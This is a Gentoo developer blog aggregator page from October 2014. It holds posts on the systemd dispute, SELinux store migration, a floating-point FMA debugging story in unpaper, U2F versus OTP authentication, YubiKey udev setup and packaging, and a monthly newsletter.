Gentoo Logo
Gentoo Logo Side
Gentoo Spaceship

. Aaron W. Swenson
. Agostino Sarubbo
. Alec Warner
. Alex Alexander
. Alex Legler
. Alexey Shvetsov
. Alexis Ballier
. Alexys Jacob
. Amadeusz Żołnowski
. Andreas K. Hüttel
. Andreas Proschofsky
. Anthony Basile
. Arun Raghavan
. Bernard Cafarelli
. Bjarke Istrup Pedersen
. Brent Baude
. Brian Harring
. Christian Ruppert
. Chí-Thanh Christopher Nguyễn
. Daniel Gryniewicz
. David Abbott
. Denis Dupeyron
. Detlev Casanova
. Diego E. Pettenò
. Domen Kožar
. Donnie Berkholz
. Doug Goldstein
. Eray Aslan
. Fabio Erculiani
. Gentoo Haskell Herd
. Gentoo Monthly Newsletter
. Gentoo News
. Gilles Dartiguelongue
. Greg KH
. Hanno Böck
. Hans de Graaff
. Ian Whyman
. Ioannis Aslanidis
. Jan Kundrát
. Jason Donenfeld
. Jeffrey Gardner
. Jeremy Olexa
. Joachim Bartosik
. Johannes Huber
. Jonathan Callen
. Jorge Manuel B. S. Vicetto
. Joseph Jezak
. Kenneth Prugh
. Lance Albertson
. Liam McLoughlin
. LinuxCrazy Podcasts
. Luca Barbato
. Luis Francisco Araujo
. Mark Loeser
. Markos Chandras
. Mart Raudsepp
. Matt Turner
. Matthew Marlowe
. Matthew Thode
. Matti Bickel
. Michael Palimaka
. Michal Hrusecky
. Michał Górny
. Mike Doty
. Mike Gilbert
. Mike Pagano
. Nathan Zachary
. Ned Ludd
. Nirbheek Chauhan
. Pacho Ramos
. Patrick Kursawe
. Patrick Lauer
. Patrick McLean
. Pavlos Ratis
. Paweł Hajdan, Jr.
. Petteri Räty
. Piotr Jaroszyński
. Rafael Goncalves Martins
. Raúl Porcel
. Remi Cardona
. Richard Freeman
. Robin Johnson
. Ryan Hill
. Sean Amoss
. Sebastian Pipping
. Steev Klimaszewski
. Stratos Psomadakis
. Sune Kloppenborg Jeppesen
. Sven Vermeulen
. Sven Wegener
. Thomas Kahle
. Tiziano Müller
. Tobias Heinlein
. Tobias Klausmann
. Tom Wijsman
. Tomáš Chvátal
. Vikraman Choudhury
. Zack Medico

Last updated:
October 31, 2014, 16:04 UTC

Views expressed in the content published here do not necessarily represent the views of Gentoo Linux or the Gentoo Foundation.

Bugs? Comments? Suggestions? Contact us!

Powered by:
Planet Venus

Welcome to Gentoo Universe, an aggregation of weblog articles on all topics written by Gentoo developers. For a more refined aggregation of Gentoo-related topics only, you might be interested in Planet Gentoo.

October 30, 2014
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)

I have been trying my best not to comment on systemd one way or another for a while. For the most part because I don't want to have a trollfest on my blog, because moderating it is something I hate and I'm sure would be needed. On the other hand it seems like people start to bring me in the conversation now from time to time.

What I would like to point out at this point is that both extreme sides of the vision are, in my opinion, behaving childishly and being totally unprofessional. Whether it is name-calling of the people or the software, death threats, insults, satirical websites, labeling of 300 people for a handful of them, etc.

I don't think I have been as happy to have a job that allows me not to care about open source as much as I did before as in the past few weeks as things keep escalating and escalating. You guys are the worst. And again I refer to both supporters and detractors, devs of systemd, devs of eudev, Debian devs and Gentoo devs, and so on so forth.

And the reason why I say this is because you both want to bring this to extremes that I think are totally uncalled for. I don't see the world in black and white and I think I said that before. Gray is nuanced and interesting, and needs skills to navigate, so I understand it's easier to just take a stand and never revise your opinion, but the easy way is not what I care about.

Myself, I decided to migrate my non-server systems to systemd a few months ago. It works fine. I've considered migrating my servers, and I decided for the moment to wait. The reason is technical for the most part: I don't think I trust the stability promises for the moment and I don't reboot servers that often anyway.

There are good things to the systemd design. And I'm sure that very few people will really miss sysvinit as is. Most people, especially in Gentoo, have not been using sysvinit properly, but rather through OpenRC, which shares more spirit with systemd than sysv, either by coincidence or because they are just the right approach to things (declarativeness to begin with).

At the same time, I don't like Lennart's approach on this to begin with, and I don't think it's uncalled for to criticize the product based on the person in this case, as the two are tightly coupled. I don't like moderating people away from a discussion, because it just ends up making the discussion even more confrontational on the next forum you stumble across them — this is why I never blacklisted Ciaran and friends from my blog even after a group of them started pasting my face on pictures of nazi soldiers from WW2. Yes I agree that Gentoo has a good chunk of toxic supporters, I wish we got rid of them a long while ago.

At the same time, if somebody were to try to categorize me the same way as the people who decided to fork udev without even thinking of what they were doing, I would want to point out that I was reproaching them from day one for their absolutely insane (and inane) starting announcement and first few commits. And I have not been using it ever, since for the moment they seem to have made good on the promise of not making it impossible to run udev without systemd.

I don't agree with the complete direction right now, and especially with the one-size-fit-all approach (on either side!) that tries to reduce the "software biodiversity". At the same time there are a few designs that would be difficult for me to attack given that they were ideas of mine as well, at some point. Such as the runtime binary approach to hardware IDs (that Greg disagreed with at the time and then was implemented by systemd/udev), or the usage of tmpfs ACLs to allow users at the console to access devices — which was essentially my original proposal to get rid of pam_console (that played with owners instead, making it messy when having more than one user at console), when consolekit and its groups-fiddling was introduced (groups can be used for setgid, not a good idea).

So why am I posting this? Mostly to tell everybody out there that if you plan on using me for either side point to be brought home, you can forget about it. I'll probably get pissed off enough to try to prove the exact opposite, and then back again.

Neither of you is perfectly right. You both make mistake. And you both are unprofessional. Try to grow up.

Edit: I mistyped eudev in the original article and it read euscan. Sorry Corentin, was thinking one thing and typing another.

Sven Vermeulen a.k.a. swift (homepage, bugs)

In a few moments, SELinux users which have the ~arch KEYWORDS set (either globally or for the SELinux utilities in particular) will notice that the SELinux userspace will upgrade to version 2.4 (release candidate 5 for now). This upgrade comes with a manual step that needs to be performed after upgrade. The information is mentioned as post-installation message of the policycoreutils package, and basically sais that you need to execute:

~# /usr/libexec/selinux/semanage_migrate_store

The reason is that the SELinux utilities expect the SELinux policy module store (and the semanage related files) to be in /var/lib/selinux and no longer in /etc/selinux. Note that this does not mean that the SELinux policy itself is moved outside of that location, nor is the basic configuration file (/etc/selinux/config). It is what tools such as semanage manage that is moved outside that location.

I tried to automate the migration as part of the packages themselves, but this would require the portage_t domain to be able to move, rebuild and load policies, which it can’t (and to be honest, shouldn’t). Instead of augmenting the policy or making updates to the migration script as delivered by the upstream project, we currently decided to have the migration done manually. It is a one-time migration anyway.

If for some reason end users forget to do the migration, then that does not mean that the system breaks or becomes unusable. SELinux still works, SELinux aware applications still work; the only thing that will fail are updates on the SELinux configuration through tools like semanage or setsebool – the latter when you want to persist boolean changes.

~# semanage fcontext -l
ValueError: SELinux policy is not managed or store cannot be accessed.
~# setsebool -P allow_ptrace on
Cannot set persistent booleans without managed policy.

If you get those errors or warnings, all that is left to do is to do the migration. Note in the following that there is a warning about ‘else’ blocks that are no longer supported: that’s okay, as far as I know (and it was mentioned on the upstream mailinglist as well as not something to worry about) it does not have any impact.

~# /usr/libexec/selinux/semanage_migrate_store
Migrating from /etc/selinux/mcs/modules/active to /var/lib/selinux/mcs/active
Attempting to rebuild policy from /var/lib/selinux
sysnetwork: Warning: 'else' blocks in optional statements are unsupported in CIL. Dropping from output.

You can also add in -c so that the old policy module store is cleaned up. You can also rerun the command multiple times:

~# /usr/libexec/selinux/semanage_migrate_store -c
warning: Policy type mcs has already been migrated, but modules still exist in the old store. Skipping store.
Attempting to rebuild policy from /var/lib/selinux

You can manually clean up the old policy module store like so:

~# rm -rf /etc/selinux/mcs/modules

So… don’t worry – the change is small and does not break stuff. And for those wondering about CIL I’ll talk about it in one of my next posts.

October 29, 2014
Nathan Zachary a.k.a. nathanzachary (homepage, bugs)
Happy 17th! (October 29, 2014, 15:10 UTC)

Just wanted to wish you a Happy 17th Birthday, Noah. I hope that it is a great day for you, and that the upcoming year is even better than this past one! My wish for you this year is that you are able to take time to enjoy the truly important things in life: family, friends, your health, and the events that don’t require anything more than your attention. Take the time—MAKE the time—to stop and appreciate the world around you.


October 27, 2014
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)

Yesterday I have released a new version of unpaper which is now in Portage, even though is dependencies are not exactly straightforward after making it use libav. But when I packaged it, I realized that the tests were failing — but I have been sure to run the tests all the time while making changes to make sure not to break the algorithms which (as you may remember) I have not designed or written — I don't really have enough math to figure out what's going on with them. I was able to simplify a few things but I needed Luca's help for the most part.

Turned out that the problem only happened when building with -O2 -march=native so I decided to restrict tests and look into it in the morning again. Indeed, on Excelsior, using -march=native would cause it to fail, but on my laptop (where I have been running the test after every single commit), it would not fail. Why? Furthermore, Luca was also reporting test failures on his laptop with OSX and clang, but I had not tested there to begin with.

A quick inspection of one of the failing tests' outputs with vbindiff showed that the diffs would be quite minimal, one bit off at some non-obvious interval. It smelled like a very minimal change. After complaining on G+, Måns pushed me to the right direction: some instruction set that differs between the two.

My laptop uses the core-avx-i arch, while the server uses bdver1. They have different levels of SSE4 support – AMD having their own SSE4a implementation – and different extensions. I should probably have paid more attention here and noticed how the Bulldozer has FMA4 instructions, but I did not, it'll show important later.

I decided to start disabling extensions in alphabetical order, mostly expecting the problem to be in AMD's implementation of some instructions pending some microcode update. When I disabled AVX, the problem went away — AVX has essentially a new encoding of instructions, so enabling AVX causes all the instructions otherwise present in SSE to be re-encoded, and is a dependency for FMA4 instructions to be usable.

The problem was reducing the code enough to be able to figure out if the problem was a bug in the code, in the compiler, in the CPU or just in the assumptions. Given that unpaper is over five thousands lines of code and comments, I needed to reduce it a lot. Luckily, there are ways around it.

The first step is to look in which part of the code the problem appears. Luckily unpaper is designed with a bunch of functions that run one after the other. I started disabling filters and masks and I was able to limit the problem to the deskewing code — which is when most of the problems happened before.

But even the deskewing code is a lot — and it depends on at least some part of the general processing to be run, including loading the file and converting it to an AVFrame structure. I decided to try to reduce the code to a standalone unit calling into the full deskewing code. But when I copied over and looked at how much code was involved, between the skew detection and the actual rotation, it was still a lot. I decided to start looking with gdb to figure out which of the two halves was misbehaving.

The interface between the two halves is well-defined: the first return the detected skew, and the latter takes the rotation to apply (the negative value to what the first returned) and the image to apply it to. It's easy. A quick look through gdb on the call to rotate() in both a working and failing setup told me that the returned value from the first half matched perfectly, this is great because it meant that the surface to inspect was heavily reduced.

Since I did not want to have to test all the code to load the file from disk and decode it into a RAW representation, I looked into the gdb manual and found the dump commands that allows you to dump part of the process's memory into a file. I dumped the AVFrame::data content, and decided to use that as an input. At first I decided to just compile it into the binary (you only need to use xxd -i to generate C code that declares the whole binary file as a byte array) but it turns out that GCC is not designed to compile efficiently a 17MB binary blob passed in as a byte array. I then opted in for just opening the raw binary file and fread() it into the AVFrame object.

My original plan involved using creduce to find the minimal set of code needed to trigger the problem, but it was tricky, especially when trying to match a complete file output to the md5. I decided to proceed with the reduction manually, starting from all the conditional for pixel formats that were not exercised… and then I realized that I could split again the code in two operations. Indeed while the main interface is only rotate(), there were two logical parts of the code in use, one translating the coordinates before-and-after the rotation, and the interpolation code that would read the old pixels and write the new ones. This latter part also depended on all the code to set the pixel in place starting from its components.

By writing as output the calls to the interpolation function, I was able to restrict the issue to the coordinate translation code, rather than the interpolation one, which made it much better: the reduced test case went down to a handful of lines:

void rotate(const float radians, AVFrame *source, AVFrame *target) {
    const int w = source->width;
    const int h = source->height;

    // create 2D rotation matrix
    const float sinval = sinf(radians);
    const float cosval = cosf(radians);
    const float midX = w / 2.0f;
    const float midY = h / 2.0f;

    for (int y = 0; y < h; y++) {
        for (int x = 0; x < w; x++) {
            const float srcX = midX + (x - midX) * cosval + (y - midY) * sinval;
            const float srcY = midY + (y - midY) * cosval - (x - midX) * sinval;
            externalCall(srcX, srcY);

Here externalCall being a simple function to extrapolate the values, the only thing it does is printing them on the standard error stream. In this version there is still reference to the input and output AVFrame objects, but as you can notice there is no usage of them, which means that now the testcase is self-contained and does not require any input or output file.

Much better but still too much code to go through. The inner loop over x was simple to remove, just hardwire it to zero and the compiler still was able to reproduce the problem, but if I hardwired y to zero, then the compiler would trigger constant propagation and just pre-calculate the right value, whether or not AVX was in use.

At this point I was able to execute creduce; I only needed to check for the first line of the output to match the "incorrect" version, and no input was requested (the radians value was fixed). Unfortunately it turns out that using creduce with loops is not a great idea, because it is well possible for it to reduce away the y++ statement or the y < h comparison for exit, and then you're in trouble. Indeed it got stuck multiple times in infinite loops on my code.

But it did help a little bit to simplify the calculation. And with again a lot of help by Måns on making sure that the sinf()/cosf() functions would not return different values – they don't, also they are actually collapsed by the compiler to a single call to sincosf(), so you don't have to write ugly code to leverage it! – I brought down the code to

extern void externCall(float);
extern float sinrotation();
extern float cosrotation();

static const float midX = 850.5f;
static const float midY = 1753.5f;

void main() {
    const float srcX = midX * cosrotation() - midY * sinrotation();

No external libraries, not even libm. The external functions are in a separate source file, and beside providing fixed values for sine and cosine, the externCall() function only calls printf() with the provided value. Oh if you're curious, the radians parameter became 0.6f, because 0, 1 and 0.5 would not trigger the behaviour, but 0.6 which is the truncated version of the actual parameter coming from the test file, would.

Checking the generated assembly code for the function then pointed out the problem, at least to Måns who actually knows Intel assembly. Here follows a diff of the code above, built with -march=bdver1 and with -march=bdver1 -mno-fma4 — because turns out the instruction causing the problem is not an AVX one but an FMA4, more on that after the diff.

        movq    -8(%rbp), %rax
        xorq    %fs:40, %rax
        jne     .L6
-       vmovss  -20(%rbp), %xmm2
-       vmulss  .LC1(%rip), %xmm0, %xmm0
-       vmulss  .LC0(%rip), %xmm2, %xmm1
+       vmulss  .LC1(%rip), %xmm0, %xmm0
+       vmovss  -20(%rbp), %xmm1
+       vfmsubss        %xmm0, .LC0(%rip), %xmm1, %xmm0
        .cfi_def_cfa 7, 8
-       vsubss  %xmm0, %xmm1, %xmm0
        jmp     externCall@PLT

It's interesting that it's changing the order of the instructions as well, as well as the constants — for this diff I have manually swapped .LC0 and .LC1 on one side of the diff, as they would just end up with different names due to instruction ordering.

As you can see, the FMA4 version has one instruction less: vfmsubss replaces both one of the vmulss and the one vsubss instruction. vfmsubss is a FMA4 instruction that performs a Fused Multiply and Subtract operation — midX * cosrotation() - midY * sinrotation() indeed has a multiply and subtract!

Originally, since I was disabling the whole AVX instruction set, all the vmulss instructions would end up replaced by mulss which is the SSE version of the same instruction. But when I realized that the missing correspondence was vfmsubss and I googled for it, it was obvious that FMA4 was the culprit, not the whole AVX.

Great, but how does that explain the failure on Luca's laptop? He's not so crazy so use an AMD laptop — nobody would be! Well, turns out that Intel also have their Fused Multiply-Add instruction set, just only with three operands rather than four, starting from Haswell CPUs, which include… Luca's laptop. A quick check on my NUC which also has a Haswell CPU confirms that the problem exists also for the core-avx2 architecture, even though the code diff is slightly less obvious:

        movq    -24(%rbp), %rax
        xorq    %fs:40, %rax
        jne     .L6
-       vmulss  .LC1(%rip), %xmm0, %xmm0
-       vmovd   %ebx, %xmm2
-       vmulss  .LC0(%rip), %xmm2, %xmm1
+       vmulss  .LC1(%rip), %xmm0, %xmm0
+       vmovd   %ebx, %xmm1
+       vfmsub132ss     .LC0(%rip), %xmm0, %xmm1
        addq    $24, %rsp
+       vmovaps %xmm1, %xmm0
        popq    %rbx
-       vsubss  %xmm0, %xmm1, %xmm0
        popq    %rbp
        .cfi_def_cfa 7, 8

Once again I swapped .LC0 and .LC1 afterwards for consistency.

The main difference here is that the instruction for fused multiply-subtract is vfmsub132ss and a vmovaps is involved as well. If I read the documentation correctly this is because it stores the result in %xmm1 but needs to move it to %xmm0 to pass it to the external function. I'm not enough of an expert to tell whether gcc is doing extra work here.

So why is this instruction causing problems? Well, Måns knew and pointed out that the result is now more precise, thus I should not work it around. Wikipedia, as linked before, points also out why this happens:

A fused multiply–add is a floating-point multiply–add operation performed in one step, with a single rounding. That is, where an unfused multiply–add would compute the product b×c, round it to N significant bits, add the result to a, and round back to N significant bits, a fused multiply–add would compute the entire sum a+b×c to its full precision before rounding the final result down to N significant bits.

Unfortunately this does mean that we can't have bitexactness of images for CPUs that implement fused operations. Which means my current test harness is not good, as it compares the MD5 of the output with the golden output from the original test. My probable next move is to use cmp to count how many bytes differ from the "golden" output (the version without optimisations in use), and if the number is low, like less than 1‰, accept it as valid. It's probably not ideal and could lead to further variation in output, but it might be a good start.

Optimally, as I said a long time ago I would like to use a tool like pdiff to tell whether there is actual changes in the pixels, and identify things like 1-pixel translation to any direction, which would be harmless… but until I can figure something out, it'll be an imperfect testsuite anyway.

A huge thanks to Måns for the immense help, without him I wouldn't have figured it out so quickly.

Why is U2F better than OTP? (October 27, 2014, 11:22 UTC)

It is not really obvious to many people how U2F is better than OTP for two-factor authentication; in particular I've seen it compared with full-blown smartcard-based authentication, and I think that's a bad comparison to do.

Indeed, since the Security Key is not protected by a PIN, and the NEO-n is designed to be semi-permanently attached to a laptop or desktop. At first this seems pretty insecure, as secure as storing the authorization straight into the computer, but it's not the case.

But let's start from the target users: the Security Key is not designed to replace the pure-paranoia security devices such as 16Kibit-per-key smartcards, but rather the on-phone or by-sms OTPs two-factor authenticators, those that use the Google Authenticator or other opensource implementations or that are configured to receive SMS.

Why replacing those? At first sight they all sound like perfectly good idea, what's to be gained to replace them? Well, there are plenty of things, the first of being the user friendliness of this concept. I know it's an overuse metaphor, but I do actually consider features on whether my mother would be able to use them or not — she's not a stupid person and can use a computer mostly just fine, but adding any on more procedures is something that would frustrate her quite a bit.

So either having to open an application and figure out which of many codes to use at one time, or having to receive an SMS and then re-type the code would be not something she'd be happy with. Even more so because she does not have a smartphone, and she does not keep her phone on all the time, as she does not want to be bothered by people. Which makes both the Authenticator and SMS ways not a good choice — and let's not try to suggests that there are way to not be available on the phone without turning it off, it would be more to learn that she does not care about.

Similar to the "phone-is-not-connected" problem, but for me rather than my mother, is the "wrong-country-for-the-phone" problem: I travel a lot, this year aiming for over a hundred days on the road, and there are very few countries in which I keep my Irish phone number available – namely Italy and the UK, where Three is available and I don't pay roaming, when the roaming system works… last time I've been to London the roaming system was not working – in the others, including the US which is obviously my main destination, I have a local SIM card so I can use data and calls. This means that if my 2FA setup sends an SMS on the Irish number, I won't receive it easily.

Admittedly, an alternative way to do this would be for me to buy a cheap featurephone, so that instead of losing access to that SIM, I can at least receive calls/SMS.

This is not only a theoretical. I have been at two conferences already (USENIX LISA 13, and Percona MySQL Conference 2014) and realized I cut myself out of my LinkedIn account: the connection comes from a completely different country than usual (US rather than Ireland) and it requires reauthentication… but it was configured to send the SMS to my Irish phone, which I had no access to. Given that at conferences is when you meet people you may want to look up on LinkedIn, it's quite inconvenient — luckily the authentication on the phone persists.

The authenticator apps are definitely more reliable than that when you travel, but they also come with their set of problems. Beside the not complete coverage of services (LinkedIn noted above for instance does not support authenticator apps), which is going to be a problem for U2F as well, at least at the beginning, neither Google's or Fedora's authenticator app allow you to take a backup of the private keys used for OTP authentication, which means that when you change your phone you'll have to replace, one by one, the OTP generation parameters. For some services such as Gandi, there is also no way to have a backup code, so if you happen to lose, break, or reset your phone without disabling the second factor auth, you're now in trouble.

Then there are a few more technical problems; HOTP, similarly to other OTP implementations, relies on shared state between the generator and the validator: a counter of how many times the code was generated. The client will increase it with every generation, the server should only increase it after a successful authentication. Even discounting bugs on the server side, a malicious actor whose intent is to lock you out can just make sure to generate enough codes on your device that the server will not look ahead enough to find the valid code.

TOTP instead relies on synchronization of time between server and generator which is a much safer assumption. Unfortunately, this also means you have a limited amount of time to type your code, which is tricky for many people who're not used to type quickly — Luca, for instance.

There is one more problem with both implementations: they rely on the user to choose the right entry and in the list and copy the right OTP value. This means you can still phish an user to type in an OTP and use it to authenticate against the service: 2FA is a protection against third parties gaining access to your account by having your password posted online rather than a protection against phishing.

U2F helps for this, as it lets the browser to handshake with the service before providing the current token to authenticate the access. Sure there might still be gaps on is implementation and since I have not studied it in depth I'm not going to vouch for it to be untouchable, but I trust the people who worked on it and I feel safer with it than I would be with a simple OTP.

October 26, 2014
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)

I have already posted a howto on how to set up the YubiKey NEO and YubiKey NEO-n for U2F, and I promised I would write a bit more on the adventure to get the software packaged in Gentoo.

You have to realize at first that my relationship with Yubico has not always being straightforward. I have at least once decided against working on the Yubico set of libraries in Gentoo because I could not get a hold of a device as I wanted to use it. But luckily now I was able to place an order with them (for some two thousands euro) and I have my devices.

But Yubico's code is usually quite well written, and designed to be packaged much more easily than most other device-specific middleware, so I cannot complain too much. Indeed, they split and release separately different libraries with different goals, so that you don't need to wait for enough magnitude to be pulled for them to make a new release. They also actively maintain their code in GitHub, and then push proper make dist releases on their website. They are in many ways a packager's dream company.

But let's get back to the devices themselves. The NEO and NEO-n come with three different interfaces: OTP (old-style YubiKey, just much longer keys), CCID (Smartcard interface) and U2F. By default the devices are configured as OTP only, which I find a bit strange to be honest. It is also the case that at the moment you cannot enable both U2F and OTP modes, I assume because there is a conflict on how the "touch" interaction behaves, indeed there is a touch-based interaction on the CCID mode that gets entirely disabled once enabling either of U2F or OTP, but the two can't share.

What is not obvious from the website is that to enable U2F (or CCID) modes, you need to use yubikey-neo-manager, an open-source app that can reconfigure the basics of the Yubico device. So I had to package the app for Gentoo of course, together with its dependencies, which turned out to be two libraries (okay actually three, but the third one sys-auth/ykpers was already packaged in Gentoo — and actually originally committed by me with Brant proxy-maintaining it, the world is small, sometimes). It was not too bad but there were a few things that might be worth noting down.

First of all, I had to deal with dev-libs/hidapi that allows programmatic access to raw HID USB devices: the ebuild failed for me, both because it was not depending on udev, and because it was unable to find the libusb headers — turned out to be caused by bashisms in the file, which became obvious as I moved to dash. I have now fixed the ebuild and sent a pull request upstream.

This was the only real hard part at first, since the rest of the ebuilds, for app-crypt/libykneomgr and app-crypt/yubikey-neo-manager were mostly straightforward ­— only I had to figure out how to install a Python package as I never did so before. It's actually fun how distutils will error out with a violation of install paths if easy_install tries to bring in a non-installed package such as nose, way before the Portage sandbox triggers.

The problems started when trying to use the programs, doubly so because I don't keep a copy of the Gentoo tree on the laptop, so I wrote the ebuilds on the headless server and then tried to run them on the actual hardware. First of all, you need to have access to the devices to be able to set them up; the libu2f-host package will install udev rules to allow the plugdev group access to the hidraw devices ­— but it also needed a pull request to fix them. I also added an alternative version of the rules for systemd users that does not rely on the group but rather uses the ACL support (I was surprised, I essentially suggested the same approach to replace pam_console years ago!)

Unfortunately that only works once the device is already set in U2F mode, which does not work when you're setting up the NEO for the first time, so I originally set it up using kdesu. I have since decided that the better way is to use the udev rules I posted in my howto post.

After this, I switched off OTP, and enabled U2F and CCID interfaces on the device — and I couldn't make it stick, the manager would keep telling me that the CCID interface was disabled, even though the USB descriptor properly called it "Yubikey NEO U2F+CCID". It took me a while to figure out that the problem was in the app-crypt/ccid driver, and indeed the change log for the latest version points out support for specifically the U2F+CCID device.

I have updated the ebuilds afterwards, not only to depend on the right version of the CCID driver – the README for libykneomgr does tell you to install pcsc-lite but not about the CCID driver you need – but also to check for the HIDRAW kernel driver, as otherwise you won't be able to either configure or use the U2F device for non-Google domains.

Now there is one more part of the story that needs to be told, but in a different post: getting GnuPG to work with the OpenPGP applet on the NEO-n. It was not as straightforward as it could have been and it did lead to disappointment. I'll be a good post for next week.

October 25, 2014
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)

When the Google Online Security blog announced earlier this week the general availability of Security Key, everybody at the office was thrilled, as we've been waiting for the day for a while. I've been using this for a while already, and my hope is for it to be easy enough for my mother and my sister, as well as my friends, to start using it.

While the promise is for a hassle-free second factor authenticator, it turns out it might not be as simple as originally intended, at least on Linux, at least right now.

Let's start with the hardware, as there are four different options of hardware that you can choose from:

  • Yubico FIDO U2F which is a simple option only supporting the U2F protocol, no configuration needed;
  • Plug-up FIDO U2F which is a cheaper alternative for the same features — I have not witnessed whether it is as sturdy as the Yubico one, so I can't vouch for it;
  • Yubikey NEO which provides multiple interface, including OTP (not usable together with U2F), OpenPGP and NFC;
  • Yubikey NEO-n the same as above, without NFC, and in a very tiny form factor designed to be left semi-permanently in a computer or laptop.

I got the NEO, but mostly to be used with LastPass ­– the NFC support allows you to have 2FA on the phone without having to type it back from a computer – and a NEO-n to leave installed on one of my computers. I already had a NEO from work to use as well. The NEO requires configuration, so I'll get back at it in a moment.

The U2F devices are accessible via hidraw, a driverless access protocol for USB devices, originally intended for devices such as keyboards and mice but also leveraged by UPSes. What happen though is that you need access to the device, that the Linux kernel will make by default accessible only by root, for good reasons.

To make the device accessible to you, the user actually at the keyboard of the computer, you have to use udev rules, and those are, as always, not straightforward. My personal hacky choice is to make all the Yubico devices accessible — the main reason being that I don't know all of the compatible USB Product IDs, as some of them are not really available to buy but come from instance from developer mode devices that I may or may not end up using.

If you're using systemd with device ACLs (in Gentoo, that would be sys-apps/systemd with acl USE flag enabled), you can do it with a file as follows:

# /etc/udev/rules.d/90-u2f-securitykey.rules
ATTRS{idVendor}=="1050", TAG+="uaccess"
ATTRS{idVendor}=="2581", ATTRS{idProduct}=="f1d0", TAG+="uaccess"

If you're not using systemd or ACLs, you can use the plugdev group and instead do it this way:

# /etc/udev/rules.d/90-u2f-securitykey.rules
ATTRS{idVendor}=="1050", GROUP="plugdev", MODE="0660"
ATTRS{idVendor}=="2581", ATTRS{idProduct}=="f1d0", GROUP="plugdev", MODE="0660"

-These rules do not include support for the Plug-up because I have no idea what their VID/PID pairs are, I asked Janne who got one so I can amend this later.- Edit: added the rules for the Plug-up device. Cute their use of f1d0 as device id.

Also note that there are properly less hacky solutions to get the ownership of the devices right, but I'll leave it to the systemd devs to figure out how to include in the default ruleset.

These rules will not only allow your user to access /dev/hidraw0 but also to the /dev/bus/usb/* devices. This is intentional: Chrome (and Chromium, the open-source version works as well) use the U2F devices in two different modes: one is through a built-in extension that works with Google assets, and it accesses the low-level device as /dev/bus/usb/*, the other is through a Chrome extension which uses /dev/hidraw* and is meant to be used by all websites. The latter is the actually standardized specification and how you're supposed to use it right now. I don't know if the former workflow is going to be deprecated at some point, but I wouldn't be surprised.

For those like me who bought the NEO devices, you'll have to enable the U2F mode — while Yubico provides the linked step-by-step guide, it was not really completely correct for me on Gentoo, but it should be less complicated now: I packaged the app-crypt/yubikey-neo-manager app, which already brings in all the necessary software, including the latest version of app-crypt/ccid required to use the CCID interface on U2F-enabled NEOs. And if you already created the udev rules file as I noted above, it'll work without you using root privileges. Just remember that if you are interested in the OpenPGP support you'll need the pcscd service (it should auto-start with both OpenRC and systemd anyway).

I'll recount separately the issues with packaging the software. In the mean time make sure you keep your accounts safe, and let's all hope that more sites will start protecting your accounts with U2F — I'll also write a separate opinion piece on why U2F is important and why it is better than OTP, this is just meant as documentation, howto set up the U2F devices on your Linux systems.

Gentoo Monthly Newsletter: September 2014 (October 25, 2014, 09:10 UTC)

Gentoo News

Council News

The september council meeting was quite uneventful. The only outcome of note was that the dohtml function for ebuilds will be deprecated now and banned in a later EAPI, with some internal consequences for, e.g., einstalldocs.


New LiveDVD - Iron Penguin Edition thanks to the Gentoo Infrastructure team and Fernando Reyes. If you haven’t yet checked it out, what are you waiting for? Go get it on your closest mirror.

Gentoo Miniconf 2014

(shameless copy of Tomas Chvatal’s report on the gentoo-project mailing list)

Hello guys,

First I would like to say big thank you to Amy (amynka) for prodding and nudging people and working on the booth. Next in line is Christopher (chithead) whom also handled our booth and even brought with him fancy MIPS machine and monitor all the way from Berlin. Kudos for that. And last I want to commend all the people giving the talks during the day. In the end we did bit Q&A with users, which was short so rest I spent asking how we should do the miniconf and what would be desired. So first lets take look on what we had and what we can do there to make it even cooler for next time:


Place where we share/sell SWAG chat with community. People stopped by, took some stickers here and there and watched the MIPS boxie we had there. I have to admit that I screwed up with our materials a bit and we didn’t have much on the stand. I thought we have more leftover stickers/brochures, but we had just few and super plan to get Gentoo t-shirts failed me miserably…

Future possibilities

Someone from Gentoo ev. could arrive too and actually sell some stuff like cups/tshirts as we seem unable to get something working here in Czech republic. With that we would have really pretty booth. People were quite interested in our merchandise and are even willing to buy it.


We had one day of talks, and basically everything went smoothly and videos will be available in near future on youtube. I will try to remember to post link here as reply when it is done (if it is not here in a week, prod me on irc because that means I forgot).

Future possibilities

We should make the thing 2 days, so it is worth for people to go to Prague, for one day I guess it is not that motivating. We should start looking for talks sooner than couple of months in advance so people can plan for it.

Overall state/possibilities

First here are photos:

Linuxdays people are more than happy to provide us with the room if we have the content. Most of the people attending to the conference speak english, so even tho quite parts of the tracks are czech, we can talk with the people around. We could do it yearly/bi-yearly, my take would be to create 2 days miniconf each two year, so next one could be done 2016 unless of course you want it next year again and tell me right now

Gentoo Developer Moves


Gentoo is made up of 242 active developers, of which 43 are currently away.
Gentoo has recruited a total of 803 developers since its inception.


  • Chris Reffett joined the Wiki team
  • Alex Brandt joined the Python and OpenStack teams
  • Brian Evans joined the PHP team
  • Alec Warner left the ComRel and Infrastructure teams
  • Michał Górny left the Portage team
  • Denis Dupeyron left the ComRel team
  • Robin H. Johnson left the ComRel team


This section summarizes the current state of the portage tree.

Architectures 45
Categories 162
Packages 17722
Ebuilds 37899
Architecture Stable Testing Total % of Packages
alpha 3661 582 4243 23.94%
amd64 10915 6318 17233 97.24%
amd64-fbsd 0 1573 1573 8.88%
arm 2701 1773 4474 25.25%
arm64 569 34 603 3.40%
hppa 3097 490 3587 20.24%
ia64 3213 627 3840 21.67%
m68k 612 98 710 4.01%
mips 0 2419 2419 13.65%
ppc 6866 2460 9326 52.62%
ppc64 4369 969 5338 30.12%
s390 1458 355 1813 10.23%
sh 1646 432 2078 11.73%
sparc 4156 916 5072 28.62%
sparc-fbsd 0 316 316 1.78%
x86 11564 5361 16925 95.50%
x86-fbsd 0 3238 3238 18.27%



The following GLSAs have been released by the Security Team

GLSA Package Description Bug
201409-10 app-shells/bash Bash: Code Injection (Updated fix for GLSA 201409-09) 523592
201409-09 app-shells/bash Bash: Code Injection 523592
201409-08 dev-libs/libxml2 libxml2: Denial of Service 509834
201409-07 net-proxy/c-icap c-icap: Denial of Service 455324
201409-06 www-client/chromium Chromium: Multiple vulnerabilities 522484
201409-05 www-plugins/adobe-flash Adobe Flash Player: Multiple vulnerabilities 522448
201409-04 dev-db/mysql MySQL: Multiple vulnerabilities 460748
